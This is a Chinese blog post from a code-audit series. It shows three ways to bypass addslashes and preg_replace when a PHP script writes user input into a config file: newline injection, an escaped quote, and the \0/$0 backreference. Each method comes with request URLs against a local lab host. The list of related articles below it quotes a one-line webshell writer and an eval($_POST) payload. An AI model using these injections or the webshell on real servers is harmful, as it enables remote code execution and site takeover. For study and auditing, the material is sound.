【代码审计】PHP写入配置文件getshell

最新推荐文章于 2024-10-04 13:24:46 发布
最新推荐文章于 2024-10-04 13:24:46 发布
阅读量750 收藏 1
点赞数
分类专栏: 【代码审计】 # 代码审计系列

看到小密圈的一个关于配置文件写入的题目,做一下记录。

问题代码:

1.php的内容如下:

config.php的内容如下:

preg_replace — 执行一个正则表达式的搜索和替换
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
搜索subject中匹配pattern的部分, 以replacement进行替换。

1)利用换行

首先请求:http://192.168.192.120/1.php?option=123%27;%0aphpinfo();//
然后查看下config.php的内容:

然后在请求:http://192.168.192.120/1.php?option=123
然后查看下config.php的内容:

2)利用转义

传入参数\’,经过addslashes处理后,会变为\\\’,随后preg_replace会将两个连续的\合并为一个,也就是将\\\’转为\\’,这样我们就成功引入了一个单引号,闭合了前面的单引号。
请求:http://192.168.192.120/1.php?option=123\%27;phpinfo();//
然后查看下config.php的内容:

3)利用\0和$0

首先请求:http://192.168.192.120/1.php?option=;phpinfo();
然后查看下config.php的内容:

preg_replace的replacement中可以包含捕获组,\0或者$0表示完整的匹配。
然后访问:http://192.168.192.120/1.php?option=$0

或者访问http://192.168.192.120/1.php?option=%00
%00在经过addslashes处理后会变成\0

FLy_鹏程万里
关注
专栏目录
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell
ShenZ的博客
04-18 768
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
finecms aip.php漏洞,代码审计| FineCMS的GetShell姿势
weixin_42311115的博客
03-11 439
0x00 背景上周,发现了finecms的一些后台的洞,斗哥先从配置文件写入开始分析,然后再结合本篇的存储XSS进行GetShell,本篇分析下存储XSS的问题,最终通过这两类洞的组合利用GetShell,期待与师傅们的交流讨论。0x01 审计过程0x00 相关环境源码信息:FineCMS v5.3.0 bulid 20180206问题文件: \finecms\finecms\system\cor...
php写入配置文件getshell,php_addslashes绕过与写入文件配置getshell
weixin_32829465的博客
03-17 202
绕过addslashes并写入文件配置getshell写入配置getshell与addslashes绕过:$str = addslashes($_GET['option']);$file = file_get_contents('xxxxx/option.php');$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $fi...
php写入配置文件getshell,配置文件写入问题
weixin_39766867的博客
03-17 249
前言:最近开始学习代码审计,因为某种原因,容易健忘,所以,打算记录在简书,一点点的去记录自己在审计复现的日常,很多审计get到的姿势,都是在P神的小蜜圈里,还是挺爽的,在里面的每一个评论都可以让你少走弯路,所以,先在这里说明下来源出处。配置文件getshell一个经典的问题,很多getshell,都是在后台中,闭合+注释的方式,写入自己的shelleg:$website='';//我们写入:a';...
PHP代码审计方法与套路
最新发布
qq_44870829的博客
10-04 648
下面定义了一个Sqlwaf函数,它过滤一些Sql注入中的敏感字符串,如and,select,from等,再定义了一个get_client_ip函数,顾名思义它的功能是获取用户的ip,clean_input,是一个过滤的函数,is_pic函数,通过判断图片后缀,判断是否是图片,最后not find,输出一些404信息。通过详细阅读公共函数文件和安全函数过滤文件等文件,清晰掌握用户输入的数据,哪些被过滤,哪些无过滤,在哪里被过滤了,如何过滤的,能否绕过过滤的数据。有没有使用addslasher()处理?
php shell,php命令行写shell实例详解
weixin_42123191的博客
03-09 229
php 可以像java perl python 那样运行,今天发现如果我早早知道这个,或许我不会去学习java 和 python当年学java不过为了一个程序放在服务器上,不停的跑啊跑,原来 php 也可以。php -hUsage: php [options] [-f] [--] [args...]php [options] -r [--] [args...]php [options] [-B...
代码审计】MIPCMS 远程写入配置文件Getshell
10-28 717
0x00 环境准备 MIPCMS官网:https://www.mipcms.cn 网站源码版本:MIPCMS内容管理系统 V3.1.0(发布时间:2018-01-01) 程序源码下载:http://www.mipcms.cn/mipcms-3.1.0.zip 本地测试网站:   0x01 代码分析 1、漏洞文件位置/app/install/controller/Install.p...
PHP正则配合写配置文件导致Getshell
weixin_30888707的博客
12-21 375
PHP正则配合写配置文件导致Getshell,偶然间看到的一个题目, p 牛的小密圈的一个问题。 分析一下,漏洞代码: index.php <?php $str=addslashes($_GET['option']); $file=file_get_contents('option.php'); $file=preg_replace('|\$option=\'.*\';|',...
php文件包含及利用其getshell
wh11te的博客
07-26 1489
0x1 php中与包含有关的函数 php中一共有4个文件包含相关的函数,分别为: include 如果未找到文件,发出警告,继续执行。 require 如果未找到文件,发出致命错误,停止执行。 include_once 与include相同,只包含一次。 require_once 与require相同,只包含一次。 ...
php写入配置文件getshell,代码审计配置文件写入导致Getshell实例分析
weixin_29322855的博客
03-17 212
原标题:代码审计配置文件写入导致Getshell实例分析*本文原创作者:davichi8282,本文属FreeBuf原创奖励计划,未经许可禁止转载0×00概述近期审计HadSky5.5.2.20180525最新版的时候发现配置文件写入导致的代码执行问题,刚开始审计的时候发现这套cms功能点真的很少,而且使用框架过滤的方式,传统注入xss问题很难发现,还有以往在审计cms安装时候是否存在配置文件任...
MIPCMS 远程写入配置文件Getshell-1.pdf
04-22
### MIPCMS 远程写入配置文件Getshell 漏洞分析与防御 #### 一、背景介绍 MIPCMS是一款广泛应用于企业网站管理的内容管理系统。然而,任何软件都可能面临安全挑战,MIPCMS也不例外。在MIPCMS内容管理系统V3.1.0...
【实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1
08-03
【实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1 在本文中,我们将深入探讨MIPCMS内容管理系统V3.1.0中的一个安全漏洞,该漏洞允许攻击者通过远程写入配置文件实现Getshell。MIPCMS是一款基于PHP的开源内容...
php审计--通过php伪协议配合文件包含写入shell
qq_29437513的博客
08-13 757
有群友问过这样一个问题,, http:xxx/123.jpg 传上这样的图片马能不能连到shell? 这有几种情况,,,php解析吧jpg解析成php,iis吧jpg解析成php都可以 我们这里通过php伪协议+存在文件包含的页面做个复现 先写个include函数,include后面没做处理的 <?php $file = $_GET['a']; include "$file"; to 然后,,如果目录阶乘符不能用,url编码后无法绕过,尝试file协议 在我本地环境www目录下存在一个无类型的a
php 写入配置文件,php将数组写入配置文件
weixin_39655993的博客
03-11 140
$arr=array('a','b','c');$str='
php写入配置文件getshell,帝国CMS(EmpireCMS) v7.5配置文件写入漏洞分析
weixin_33256233的博客
03-17 314
帝国cms(empirecms) v7.5配置文件写入漏洞分析一、漏洞描述该漏洞是由于安装程序时没有对用户的输入做严格过滤,导致用户输入的可控参数被写入配置文件,造成任意代码执行漏洞。二、漏洞复现1、漏洞出现位置如下图,phome_表前缀没有被严格过滤导致攻击者构造恶意的代码2、定位漏洞出现的位置,发现在/e/install/index.php,下图可以看到表名前缀phome_,将获取表名前缀交给...
phpshell脚本
weixin_33893473的博客
07-04 221
<?php$file="jack.php";//可根据文件名更改,也可以写入指定一个目录.fwrite(fopen("$file","w+"),$_GET['badboy']);?>PS:感谢朋友们,欢迎大家交流http://127.0.0.1/1.php?badboy=<?php eval($_POST[h]);?> 转载于:https...
phpshell,如何利用PHPShell
weixin_42134097的博客
03-09 777
Shell是什么?熟悉Linux的人应该都知道,Shell是一种脚本程序,底层应该是用C语言写的。我们其实是仿造的Shell的实现。怎么可以用PHP写呢?实际上要说的是用PHP如何实现一组控制台程序。控制台程序应该明白了吧!就是典型的黑白屏程序。第一步要解决执行问题:我们可以写成.php文件,然后调用php xxx.php就可以执行了。这个决定与你的PHP在编译的时候支持CLI。当然这个也是正篇文...
php写一个shell脚本文件格式,一篇文章学会——shell脚本编写
weixin_35458961的博客
03-23 665
用了caffe有一段时间了,感觉自己写shell脚本的能力有待提高,特地从菜鸟笔记处系统的看了一遍,其实学习基础就可,内容也不多,我就不总结了。把网站上的内容用markdown重新编辑了一下,各位可以根据需要看看;第一个shell脚本:打开文本编辑器(可以使用 vi/vim 命令来创建文件),新建一个文件 test.sh,扩展名为 sh(sh代表shell),扩展名并不影响脚本执行,见名知意就好,...
PHP文件包含利用phpinfo写入shell
qq_63489512的博客
07-11 983
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当php文件来执行,这会为开发者节省大量的时间。这意味着可以创建供所有网页应用的标准页眉或者菜单文件。当页眉需要更新时,只需更新一个包含文件就可以了。当遇到PHP文件包含漏洞时,如果找不到可以包含的文件,可以通过包含临时文件来GetShell。由于临时文件的文件名是随机的,如果目标网站存在phpinfo,则可以通过phpinfo来获取临时文件名,进而完成包含。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值